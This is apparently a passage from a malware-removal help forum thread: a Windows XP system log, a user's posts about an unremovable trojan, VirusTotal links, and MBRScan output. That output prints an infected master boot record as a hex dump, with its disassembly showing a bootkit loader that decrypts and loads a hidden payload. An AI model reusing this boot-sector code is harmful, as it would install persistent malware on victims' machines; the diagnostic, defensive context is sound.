2012-07-18 12:57:15 ----SHD---- C:\WINDOWS\Temporary Internet Files
2012-07-18 12:18:07 ----D---- C:\Program Files\FlashFXP 4
2012-07-18 12:13:28 ----A---- C:\WINDOWS\system32\FlashPlayerApp.exe
2012-07-18 11:58:31 ----D---- C:\Qoobox
2012-07-18 11:43:23 ----A---- C:\WINDOWS\system.ini
2012-07-18 11:38:03 ----DC---- C:\WINDOWS\system32\dllcache
2012-07-18 11:25:13 ----D---- C:\WINDOWS\AppPatch
2012-07-18 11:25:11 ----D---- C:\Program Files\Common Files
2012-07-18 11:07:36 ----D---- C:\Documents and Settings\Monička\Application Data\Skype
2012-07-18 11:07:33 ----D---- C:\WINDOWS\Minidump
2012-07-18 10:52:18 ----D---- C:\WINDOWS\system32\CatRoot
2012-07-18 10:47:22 ----D---- C:\WINDOWS\system32\config
2012-07-18 10:46:03 ----D---- C:\WINDOWS\system32\wbem
2012-07-18 10:45:57 ----D---- C:\WINDOWS\Registration
2012-07-18 10:45:20 ----D---- C:\Documents and Settings\Monička\Application Data\dvdcss
2012-07-18 10:39:37 ----D---- C:\Documents and Settings\Monička\Application Data\GetRightToGo
2012-07-18 10:37:34 ----D---- C:\Documents and Settings
2012-07-17 22:48:24 ----D---- C:\WINDOWS\Prefetch
2012-07-16 15:06:07 ----D---- C:\Documents and Settings\Monička\Application Data\ICQ
2012-07-14 19:03:10 ----D---- C:\WINDOWS\Logs
2012-07-14 19:03:10 ----D---- C:\WINDOWS\Debug
2012-07-12 13:20:57 ----D---- C:\Program Files\RapidShareManager
2012-07-11 17:20:07 ----HD---- C:\WINDOWS\$hf_mig$
2012-07-11 17:19:51 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
2012-07-11 17:19:36 ----A---- C:\WINDOWS\win.ini
2012-07-11 17:19:34 ----D---- C:\Program Files\Common Files\System
2012-07-05 22:28:59 ----A---- C:\WINDOWS\NeroDigital.ini
2012-06-28 06:33:19 ----D---- C:\Program Files\LogMeIn Hamachi
2012-06-26 06:08:26 ----D---- C:\WINDOWS\Help
2012-06-25 18:30:42 ----D---- C:\WINDOWS\WinSxS
2012-06-25 18:29:58 ----D---- C:\WINDOWS\system32\DirectX
2012-06-25 18:29:24 ----RSD---- C:\WINDOWS\assembly
2012-06-25 18:17:23 ----D---- C:\Program Files\Ubisoft
2012-06-25 18:17:21 ----HD---- C:\Program Files\InstallShield Installation Information
2012-06-25 11:11:33 ----A---- C:\WINDOWS\system32\PnkBstrB.exe
2012-06-25 11:04:08 ----D---- C:\Documents and Settings\Monička\Application Data\Ubisoft
2012-06-25 11:02:34 ----D---- C:\Documents and Settings\All Users\Application Data\Ubisoft
2012-06-25 06:56:15 ----A---- C:\WINDOWS\BlendSettings.ini
2012-06-24 22:55:05 ----D---- C:\WINDOWS\security
2012-06-19 14:59:17 ----D---- C:\Documents and Settings\Monička\Application Data\Media Player Classic

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 cmderd;COMODO Internet Security Eradication Driver; C:\WINDOWS\System32\DRIVERS\cmderd.sys [2012-03-11 18056]
R1 cmdGuard;COMODO Internet Security Sandbox Driver; C:\WINDOWS\System32\DRIVERS\cmdguard.sys [2012-03-11 494968]
R1 cmdHlp;COMODO Internet Security Helper Driver; C:\WINDOWS\System32\DRIVERS\cmdhlp.sys [2012-03-11 31704]
R1 easdrv;easdrv; C:\WINDOWS\system32\DRIVERS\easdrv.sys [2008-07-01 53256]
R1 epfwtdir;epfwtdir; C:\WINDOWS\system32\DRIVERS\epfwtdir.sys [2008-07-01 34312]
R1 intelppm;Intel Processor Driver; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-13 36352]
R1 WS2IFSL;Windows Socket 2.0 Non-IFS Service Provider Support Environment; C:\WINDOWS\System32\drivers\ws2ifsl.sys [2001-08-23 12032]
R2 cpuz135;cpuz135; \??\C:\WINDOWS\system32\drivers\cpuz135_x32.sys []
R2 eamon;EAMON; C:\WINDOWS\system32\DRIVERS\eamon.sys [2008-07-01 39944]
R2 TBPanel;TBPanel; C:\WINDOWS\system32\drivers\TBPanel.sys [2007-03-16 12256]
R3 hamachi;Hamachi Network Interface; C:\WINDOWS\system32\DRIVERS\hamachi.sys [2009-03-18 26176]
R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2008-02-14 4676096]
R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-09-11 6128352]
R3 pcouffin;VSO Software pcouffin; C:\WINDOWS\System32\Drivers\pcouffin.sys [2010-03-13 47360]
R3 pfc;Padus ASPI Shell; C:\WINDOWS\system32\drivers\pfc.sys [2003-11-11 9856]
R3 RTLE8023xp;Realtek 10/100/1000 PCI-E NIC Family NDIS XP Driver; C:\WINDOWS\system32\DRIVERS\Rtenicxp.sys [2008-01-03 105856]
R3 usbehci;Microsoft USB 2.0 Enhanced Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
R3 usbhub;Microsoft USB Standard Hub Driver; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
R3 usbstor;USB Mass Storage Driver; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
R3 usbuhci;Microsoft USB Universal Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
S3 aasde6iw;aasde6iw; C:\WINDOWS\system32\drivers\aasde6iw.sys []
S3 Cardex;Cardex; \??\C:\WINDOWS\system32\drivers\TBPANEL.SYS []
S3 catchme;catchme; \??\C:\DOCUME~1\MONIKA~1\LOCALS~1\Temp\catchme.sys []
S3 gdrv;gdrv; \??\C:\WINDOWS\gdrv.sys []
S3 HidUsb;Microsoft HID Class Driver; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
S3 MarvinBus;Pinnacle Marvin Bus; C:\WINDOWS\system32\DRIVERS\MarvinBus.sys [2005-09-23 171520]
S3 nmwcd;Nokia USB Phone Parent Driver; C:\WINDOWS\system32\drivers\ccdcmb.sys [2011-08-17 18176]
S3 nmwcdc;Nokia USB Communication Driver; C:\WINDOWS\system32\drivers\ccdcmbo.sys [2011-08-17 23168]
S3 upperdev;upperdev; C:\WINDOWS\system32\DRIVERS\usbser_lowerflt.sys [2011-08-17 8192]
S3 usbccgp;Microsoft USB Generic Parent Driver; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
S3 usbprint;Microsoft USB PRINTER Class; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
S3 usbscan;USB Scanner Driver; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-13 15104]
S3 usbser;USB Modem Driver; C:\WINDOWS\system32\drivers\usbser.sys [2008-04-13 26112]
S3 UsbserFilt;UsbserFilt; C:\WINDOWS\system32\DRIVERS\usbser_lowerfltj.sys [2011-08-17 8192]
S3 Wdf01000;Wdf01000; C:\WINDOWS\system32\DRIVERS\Wdf01000.sys [2009-07-14 444136]
S3 WpdUsb;WpdUsb; C:\WINDOWS\System32\Drivers\wpdusb.sys [2005-01-28 18944]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 Bonjour Service;##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762##; C:\Program Files\Bonjour\mDNSResponder.exe [2006-02-28 229376]
R2 CLPSLS;COMODO livePCsupport Service; C:\Program Files\COMODO\COMODO GeekBuddy\CLPSLS.exe [2011-11-23 1052472]
R2 cmdAgent;COMODO Internet Security Helper Service; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [2012-03-11 1983232]
R2 ekrn;Eset Service; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [2008-07-01 468224]
R2 FirebirdGuardianDefaultInstance;Firebird Guardian - DefaultInstance; C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe [2007-10-16 81920]
R2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [2012-06-27 1385896]
R2 ICQ Service;ICQ Service; C:\Program Files\ICQ6Toolbar\ICQ Service.exe [2008-06-10 222456]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2011-11-10 153376]
R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-09-11 163908]
R2 PnkBstrA;PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [2011-04-16 75136]
R2 StarWindServiceAE;StarWind AE Service; C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [2009-12-23 370688]
R2 UMWdf;Windows User Mode Driver Framework; C:\WINDOWS\system32\wdfmgr.exe [2005-01-28 38912]
R2 wlidsvc;Windows Live ID Sign-in Assistant; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2009-08-18 1529728]
R3 FirebirdServerDefaultInstance;Firebird Server - DefaultInstance; C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe [2007-10-16 2711552]
S2 gupdate;Google Update Service (gupdate); C:\Program Files\Google\Update\GoogleUpdate.exe [2011-06-13 135664]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [2009-06-23 72704]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-07-18 250056]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2008-07-25 34312]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2008-07-25 69632]
S3 EhttpSrv;Eset HTTP Server; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [2008-07-01 19200]
S3 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-06-24 654848]
S3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe [2008-07-29 46104]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files\Google\Update\GoogleUpdate.exe [2011-06-13 135664]
S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2008-07-29 881664]
S3 Microsoft Office Groove Audit Service;Microsoft Office Groove Audit Service; C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe [2009-02-26 64856]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2011-07-20 440696]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2008-07-29 132096]

-----------------EOF-----------------

Re: virus cannot be removed by antivirus

Posted: 18 Jul 2012 14:44
by hunterwx
Sorry, I didn't know that you're not supposed to use Combo, since it has always helped me and then I didn't have to bother anyone like this. And I can't paste the Combo log here because it has too many characters. How am I supposed to paste it? Every time it tells me: "Your message contains 162310 characters. The maximum allowed number of characters is 80000." As for the virus, I have no idea where exactly it's located or what it's called; I only know it messed up my PC so that all my icons disappeared. I went into safe mode and did a restore, but the antivirus showed me that the trojan horse cannot be cleaned. I don't know anything more about it, sorry.

I really don't know how to paste it here. Should I try in two parts, or should I make the log again, or upload it somewhere?

Re: virus cannot be removed by antivirus

Posted: 18 Jul 2012 15:02
by hunterwx
Well, I don't have that report, because my computer reset immediately and the report vanished :( and it hasn't reappeared since. The first time it only appeared after about 2 hours, so now I'm just dreading when it does it to me again.. :( Can't it be done without it? Sorry for all the trouble you're having with this, I apologize very much for the problems caused, and I promise I won't touch Combo again without being told to.

Re: virus cannot be removed by antivirus

Posted: 18 Jul 2012 15:42
by hunterwx
c:\windows\explorer.exe
https://www.virustotal.com/file/8c7e8bc ... /analysis/


c:\windows\regedit.exe
https://www.virustotal.com/file/06cb6f4 ... /analysis/


c:\windows\system32\xcdzip32.dll
https://www.virustotal.com/file/cf84342 ... /analysis/

c:\windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\oisicon.exe
https://www.virustotal.com/file/094a403 ... /analysis/

Code:

MBRScan v1.1.1

OS             : Windows XP Home Service Pack 3 (32 bit)
PROCESSOR      : x86 Family 6 Model 23 Stepping 6, GenuineIntel
BOOT           : Normal Boot
DATE           : 2012/07/18 (ISO 8601) at 16:33:56
________________________________________________________________________________

DISK           : Device\Harddisk0\DR0 __SAMSUNG HD322HJ (1AC01113)
BUS_TYPE       : (0x03)  P-ATA
USE_PIO        : YES
MAX_TRANSFER   : 128 Kb
ALIGNMENT_MASK : word aligned
________________________________________________________________________________

Device\Harddisk0\DR0	298.1 Go  [Fixed] ==> Possible MaxSS.sst MBR Code

MBR_MD5   : 7EBCF55B858704D10A1A02FDC8671F16
MBR_SHA1  : 813651AC57C241F5DBA0DB83B58D46BBF1F7DA4B

Device\Harddisk0\Partition1	146.5 Go  	0x07 NTFS / HPFS __ BOOTABLE __
Device\Harddisk0\Partition2	151.6 Go  	0x07 NTFS / HPFS
________________________________________________________________________________

############################### Additional scan ################################

SystemStartOptions : NOEXECUTE=OPTIN  FASTDETECT

________________________________________________________________________________

_____FAKED   \Device\Harddisk0\DR0  

0x00000000   31 C0 8E D0 BC 00 7C 0E 1F 0E 07 66 60 88 16 00   1À.м.|....f`...
0x00000010   7E C6 06 04 7E 1E B4 48 BE 04 7E CD 13 B0 50 0F   ~Æ..~.´H¾.~Í.°P.
0x00000020   82 7B 01 81 2E 13 04 14 00 A1 13 04 C1 E0 06 A3   .{.......¡..Áà.£
0x00000030   02 7E 81 EC 0E 00 68 10 00 89 E5 BE A1 7D B9 05   .~.ì..h...御}¹.
0x00000040   00 66 31 DB E8 F8 00 FF 36 02 7E 07 8C 46 06 8C   .f1Ûèø..6.~..F..
0x00000050   5E 04 E8 09 00 81 C4 10 00 66 61 06 1E CB 66 60   ^.è...Ä..fa..Ëf`
0x00000060   57 66 FF 36 14 7E 66 8F 46 08 66 FF 36 18 7E 66   Wf.6.~f.F.f.6.~f
0x00000070   8F 46 0C 66 8B 45 10 66 40 66 29 46 08 66 19 5E   .F.f.E.f@f)F.f.^
0x00000080   0C 8B 45 14 89 46 02 B4 42 8A 16 00 7E 89 EE CD   ..E..F.´B...~.îÍ
0x00000090   13 B0 52 0F 82 07 01 31 C0 BA 04 04 BE B2 7D 88   .°R....1Àº..¾²}.
0x000000A0   9F 42 7E FE C3 75 F8 8A 8F 42 7E 02 04 E8 7E 00   .B~þÃuø..B~..è~.
0x000000B0   46 FE CE 75 04 29 D6 88 D6 FE C3 75 EA 31 C0 89   FþÎu.)Ö.ÖþÃuê1À.
0x000000C0   C3 8B 56 02 C1 E2 09 8B 76 04 FE C3 8A 8F 42 7E   Ã.V.Áâ..v.þÃ..B~
0x000000D0   E8 5B 00 00 E9 30 ED 89 CF 8A 8D 42 7E 26 30 0C   è[..é0í.Ï..B~&0.
0x000000E0   46 4A 75 E6 5F 66 8B 4D 18 66 0F B7 56 04 81 F9   FJuæ_f.M.f.·V..ù
0x000000F0   FF 7F B0 53 0F 87 A6 00 66 FF 75 1C 66 31 C0 66   ..°S..¦.f.u.f1Àf
0x00000100   89 45 1C 66 F7 D0 26 67 32 02 66 42 B3 08 66 D1   .E.f÷Ð&g2.fB³.fÑ
0x00000110   E8 73 06 66 35 20 83 B8 ED FE CB 75 F1 E2 E7 66   ès.f5 .¸íþËuñâçf
0x00000120   F7 D0 66 5B 66 39 D8 B0 43 75 73 66 61 C3 00 C8   ÷Ðf[f9ذCusfaÃ.È
0x00000130   89 C7 8A AD 42 7E 88 AF 42 7E 88 8D 42 7E C3 66   .Ç.­B~.¯B~..B~Ãf
0x00000140   60 BF 00 80 8C 4E 06 89 7E 04 66 89 D8 40 89 45   `¿...N..~.f.Ø@.E
0x00000150   14 66 0F B7 06 B6 7D 66 89 45 10 B8 20 00 E8 FD   .f.·.¶}f.E.¸ .èý
0x00000160   FE 8B 7E 04 8B 55 18 FC 60 F3 A6 81 7D FE 5C 00   þ.~..U.ü`ó¦.}þ\.
0x00000170   74 0E E3 0E 61 01 C7 29 C2 77 ED B0 4E E9 1E 00   t.ã.a.Ç)Âwí°Né..
0x00000180   41 4E 5F 81 C4 0E 00 60 89 FE BF 22 7E 59 57 89   AN_.Ä..`.þ¿"~YW.
0x00000190   C1 F3 A4 61 E3 03 E9 C5 FF 59 57 66 61 C3 F4 EB   Áó¤aã.éÅ.YWfaÃôë
0x000001A0   FD 5C 62 6F 6F 74 00 00 00 00 00 00 00 00 00 00   ý\boot..........
0x000001B0   00 00 A8 D3 17 78 BF F6 BA 41 BB 41 00 00 80 01   ..¨Ó.x¿öºA»A....
0x000001C0   01 00 07 FE FF FF 3F 00 00 00 F3 6B 4F 12 00 00   ...þ..?...ókO...
0x000001D0   C1 FF 0F FE FF FF 32 6C 4F 12 CE 2B F3 12 00 00   Á..þ..2lO.Î+ó...
0x000001E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA   ..............Uª

__ORIGINAL   \Device\Harddisk0\DR0  

0x00000000   33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 1B 7C   3À.м.|ûP.P.ü¾.|
0x00000010   BF 1B 06 50 57 B9 E5 01 F3 A4 CB BD BE 07 B1 04   ¿..PW¹å.ó¤Ë½¾.±.
0x00000020   38 6E 00 7C 09 75 13 83 C5 10 E2 F4 CD 18 8B F5   8n.|.u..Å.âôÍ..õ
0x00000030   83 C6 10 49 74 19 38 2C 74 F6 A0 B5 07 B4 07 8B   .Æ.It.8,tö.µ.´..
0x00000040   F0 AC 3C 00 74 FC BB 07 00 B4 0E CD 10 EB F2 88   ð¬<.tü»..´.Í.ëò.
0x00000050   4E 10 E8 46 00 73 2A FE 46 10 80 7E 04 0B 74 0B   N.èF.s*þF..~..t.
0x00000060   80 7E 04 0C 74 05 A0 B6 07 75 D2 80 46 02 06 83   .~..t..¶.uÒ.F...
0x00000070   46 08 06 83 56 0A 00 E8 21 00 73 05 A0 B6 07 EB   F...V..è!.s..¶.ë
0x00000080   BC 81 3E FE 7D 55 AA 74 0B 80 7E 10 00 74 C8 A0   ¼.>þ}Uªt..~..tÈ.
0x00000090   B7 07 EB A9 8B FC 1E 57 8B F5 CB BF 05 00 8A 56   ·.ë©.ü.W.õË¿...V
0x000000A0   00 B4 08 CD 13 72 23 8A C1 24 3F 98 8A DE 8A FC   .´.Í.r#.Á$?..Þ.ü
0x000000B0   43 F7 E3 8B D1 86 D6 B1 06 D2 EE 42 F7 E2 39 56   C÷ã.Ñ.Ö±.ÒîB÷â9V
0x000000C0   0A 77 23 72 05 39 46 08 73 1C B8 01 02 BB 00 7C   .w#r.9F.s.¸..».|
0x000000D0   8B 4E 02 8B 56 00 CD 13 73 51 4F 74 4E 32 E4 8A   .N..V.Í.sQOtN2ä.
0x000000E0   56 00 CD 13 EB E4 8A 56 00 60 BB AA 55 B4 41 CD   V.Í.ëä.V.`»ªU´AÍ
0x000000F0   13 72 36 81 FB 55 AA 75 30 F6 C1 01 74 2B 61 60   .r6.ûUªu0öÁ.t+a`
0x00000100   6A 00 6A 00 FF 76 0A FF 76 08 6A 00 68 00 7C 6A   j.j..v..v.j.h.|j
0x00000110   01 6A 10 B4 42 8B F4 CD 13 61 61 73 0E 4F 74 0B   .j.´B.ôÍ.aas.Ot.
0x00000120   32 E4 8A 56 00 CD 13 EB D6 61 F9 C3 49 6E 76 61   2ä.V.Í.ëÖaùÃInva
0x00000130   6C 69 64 20 70 61 72 74 69 74 69 6F 6E 20 74 61   lid partition ta
0x00000140   62 6C 65 00 45 72 72 6F 72 20 6C 6F 61 64 69 6E   ble.Error loadin
0x00000150   67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74   g operating syst
0x00000160   65 6D 00 4D 69 73 73 69 6E 67 20 6F 70 65 72 61   em.Missing opera
0x00000170   74 69 6E 67 20 73 79 73 74 65 6D 00 00 00 00 00   ting system.....
0x00000180   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000190   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001A0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001B0   00 00 00 00 00 2C 44 63 BA 41 BB 41 00 00 80 01   .....,DcºA»A....
0x000001C0   01 00 07 FE FF FF 3F 00 00 00 F3 6B 4F 12 00 00   ...þ..?...ókO...
0x000001D0   C1 FF 0F FE FF FF 32 6C 4F 12 CE 2B F3 12 00 00   Á..þ..2lO.Î+ó...
0x000001E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA   ..............Uª

__________________________16_BIT_ASM_CODE
   
0x0000    31c0            XOR AX, AX   
0x0002    8ed0            MOV SS, AX   
0x0004    bc 007c         MOV SP, 0x7c00   
0x0007    0e              PUSH CS   
0x0008    1f              POP DS   
0x0009    0e              PUSH CS   
0x000A    07              POP ES   
0x000B    66 60           PUSHAD   
0x000D    8816 007e       MOV [0x7e00], DL   
0x0011    c606 047e 1e    MOV BYTE [0x7e04], 0x1e   
0x0016    b4 48           MOV AH, 0x48   
0x0018    be 047e         MOV SI, 0x7e04   
0x001B    cd 13           INT 0x13   
0x001D    b0 50           MOV AL, 0x50   
0x001F    0f82 7b01       JB 0x19e   
0x0023    812e 1304 1400  SUB WORD [0x413], 0x14   
0x0029    a1 1304         MOV AX, [0x413]   
0x002C    c1e0 06         SHL AX, 0x6   
0x002F    a3 027e         MOV [0x7e02], AX   
0x0032    81ec 0e00       SUB SP, 0xe   
0x0036    68 1000         PUSH 0x10   
0x0039    89e5            MOV BP, SP   
0x003B    be a17d         MOV SI, 0x7da1   
0x003E    b9 0500         MOV CX, 0x5   
0x0041    66 31db         XOR EBX, EBX   
0x0044    e8 f800         CALL 0x13f   
0x0047    ff36 027e       PUSH WORD [0x7e02]   
0x004B    07              POP ES   
0x004C    8c46 06         MOV WORD [BP+0x6], ES   
0x004F    8c5e 04         MOV WORD [BP+0x4], DS   
0x0052    e8 0900         CALL 0x5e   
0x0055    81c4 1000       ADD SP, 0x10   
0x0059    66 61           POPAD   
0x005B    06              PUSH ES   
0x005C    1e              PUSH DS   
0x005D    cb              RETF   
0x005E    66 60           PUSHAD   
0x0060    57              PUSH DI   
0x0061    66 ff36 147e    PUSH DWORD [0x7e14]   
0x0066    66 8f46 08      POP DWORD [BP+0x8]   
0x006A    66 ff36 187e    PUSH DWORD [0x7e18]   
0x006F    66 8f46 0c      POP DWORD [BP+0xc]   
0x0073    66 8b45 10      MOV EAX, [DI+0x10]   
0x0077    66 40           INC EAX   
0x0079    66 2946 08      SUB [BP+0x8], EAX   
0x007D    66 195e 0c      SBB [BP+0xc], EBX   
0x0081    8b45 14         MOV AX, [DI+0x14]   
0x0084    8946 02         MOV [BP+0x2], AX   
0x0087    b4 42           MOV AH, 0x42   
0x0089    8a16 007e       MOV DL, [0x7e00]   
0x008D    89ee            MOV SI, BP   
0x008F    cd 13           INT 0x13   
0x0091    b0 52           MOV AL, 0x52   
0x0093    0f82 0701       JB 0x19e   
0x0097    31c0            XOR AX, AX   
0x0099    ba 0404         MOV DX, 0x404   
0x009C    be b27d         MOV SI, 0x7db2   
0x009F    889f 427e       MOV [BX+0x7e42], BL   
0x00A3    fec3            INC BL   
0x00A5    75 f8           JNZ 0x9f   
0x00A7    8a8f 427e       MOV CL, [BX+0x7e42]   
0x00AB    0204            ADD AL, [SI]   
0x00AD    e8 7e00         CALL 0x12e   
0x00B0    46              INC SI   
0x00B1    fece            DEC DH   
0x00B3    75 04           JNZ 0xb9   
0x00B5    29d6            SUB SI, DX   
0x00B7    88d6            MOV DH, DL   
0x00B9    fec3            INC BL   
0x00BB    75 ea           JNZ 0xa7   
0x00BD    31c0            XOR AX, AX   
0x00BF    89c3            MOV BX, AX   
0x00C1    8b56 02         MOV DX, [BP+0x2]   
0x00C4    c1e2 09         SHL DX, 0x9   
0x00C7    8b76 04         MOV SI, [BP+0x4]   
0x00CA    fec3            INC BL   
0x00CC    8a8f 427e       MOV CL, [BX+0x7e42]   
0x00D0    e8 5b00         CALL 0x12e   
0x00D3    00e9            ADD CL, CH   
0x00D5    30ed            XOR CH, CH   
0x00D7    89cf            MOV DI, CX   
0x00D9    8a8d 427e       MOV CL, [DI+0x7e42]   
0x00DD    26 300c         XOR ES:[SI], CL   
0x00E0    46              INC SI   
0x00E1    4a              DEC DX   
0x00E2    75 e6           JNZ 0xca   
0x00E4    5f              POP DI   
0x00E5    66 8b4d 18      MOV ECX, [DI+0x18]   
0x00E9    66 0fb756 04    MOVZX EDX, [BP+0x4]   
0x00EE    81f9 ff7f       CMP CX, 0x7fff   
0x00F2    b0 53           MOV AL, 0x53   
0x00F4    0f87 a600       JA 0x19e   
0x00F8    66 ff75 1c      PUSH DWORD [DI+0x1c]   
0x00FC    66 31c0         XOR EAX, EAX   
0x00FF    66 8945 1c      MOV [DI+0x1c], EAX   
0x0103    66 f7d0         NOT EAX   
0x0106    26 67 3202      XOR AL, ES:[EDX]   
0x010A    66 42           INC EDX   
0x010C    b3 08           MOV BL, 0x8   
0x010E    66 d1e8         SHR EAX, 0x1   
0x0111    73 06           JAE 0x119   
0x0113    66 35 2083b8ed  XOR EAX, 0xedb88320   
0x0119    fecb            DEC BL   
0x011B    75 f1           JNZ 0x10e   
0x011D    e2 e7           LOOP 0x106   
0x011F    66 f7d0         NOT EAX   
0x0122    66 5b           POP EBX   
0x0124    66 39d8         CMP EAX, EBX   
0x0127    b0 43           MOV AL, 0x43   
0x0129    75 73           JNZ 0x19e   
0x012B    66 61           POPAD   
0x012D    c3              RET   
0x012E    00c8            ADD AL, CL   
0x0130    89c7            MOV DI, AX   
0x0132    8aad 427e       MOV CH, [DI+0x7e42]   
0x0136    88af 427e       MOV [BX+0x7e42], CH   
0x013A    888d 427e       MOV [DI+0x7e42], CL   
0x013E    c3              RET   
0x013F    66 60           PUSHAD   
0x0141    bf 0080         MOV DI, 0x8000   
0x0144    8c4e 06         MOV WORD [BP+0x6], CS   
0x0147    897e 04         MOV [BP+0x4], DI   
0x014A    66 89d8         MOV EAX, EBX   
0x014D    40              INC AX   
0x014E    8945 14         MOV [DI+0x14], AX   
0x0151    66 0fb706 b67d  MOVZX EAX, [0x7db6]   
0x0157    66 8945 10      MOV [DI+0x10], EAX   
0x015B    b8 2000         MOV AX, 0x20   
0x015E    e8 fdfe         CALL 0x5e   
0x0161    8b7e 04         MOV DI, [BP+0x4]   
0x0164    8b55 18         MOV DX, [DI+0x18]   
0x0167    fc              CLD   
0x0168    60              PUSHA   
0x0169    f3 a6           REP CMPSB   
0x016B    817d fe 5c00    CMP WORD [DI-0x2], 0x5c   
0x0170    74 0e           JZ 0x180   
0x0172    e3 0e           JCXZ 0x182   
0x0174    61              POPA   
0x0175    01c7            ADD DI, AX   
0x0177    29c2            SUB DX, AX   
0x0179    77 ed           JA 0x168   
0x017B    b0 4e           MOV AL, 0x4e   
0x017D    e9 1e00         JMP 0x19e   
0x0180    41              INC CX   
0x0181    4e              DEC SI   
0x0182    5f              POP DI   
0x0183    81c4 0e00       ADD SP, 0xe   
0x0187    60              PUSHA   
0x0188    89fe            MOV SI, DI   
0x018A    bf 227e         MOV DI, 0x7e22   
0x018D    59              POP CX   
0x018E    57              PUSH DI   
0x018F    89c1            MOV CX, AX   
0x0191    f3 a4           REP MOVSB   
0x0193    61              POPA   
0x0194    e3 03           JCXZ 0x199   
0x0196    e9 c5ff         JMP 0x15e   
0x0199    59              POP CX   
0x019A    57              PUSH DI   
0x019B    66 61           POPAD   
0x019D    c3              RET   
0x019E    f4              HLT   
0x019F    eb fd           JMP 0x19e   
0x01A1    5c              POP SP   
0x01A2    626f 6f         BOUND BP, [BX+0x6f]   
0x01A5    74 00           JZ 0x1a7   
0x01A7    0000            ADD [BX+SI], AL   
0x01A9    0000            ADD [BX+SI], AL   
0x01AB    0000            ADD [BX+SI], AL   
0x01AD    0000            ADD [BX+SI], AL   
0x01AF    0000            ADD [BX+SI], AL   
0x01B1    00a8 d317       ADD [BX+SI+0x17d3], CH   
0x01B5    78 bf           JS 0x176   
0x01B7    f6ba 41bb       IDIV BYTE [BP+SI-0x44bf]   
0x01BB    41              INC CX   
0x01BC    0000            ADD [BX+SI], AL   
0x01BE    8001 01         ADD BYTE [BX+DI], 0x1   
0x01C1    0007            ADD [BX], AL   
0x01C3    fe              DB 0xfe   
0x01C4    ff              DB 0xff   
0x01C5    ff              DB 0xff   
0x01C6    3f              AAS   
0x01C7    0000            ADD [BX+SI], AL   
0x01C9    00f3            ADD BL, DH   
0x01CB    6b4f 12 00      IMUL CX, [BX+0x12], 0x0   
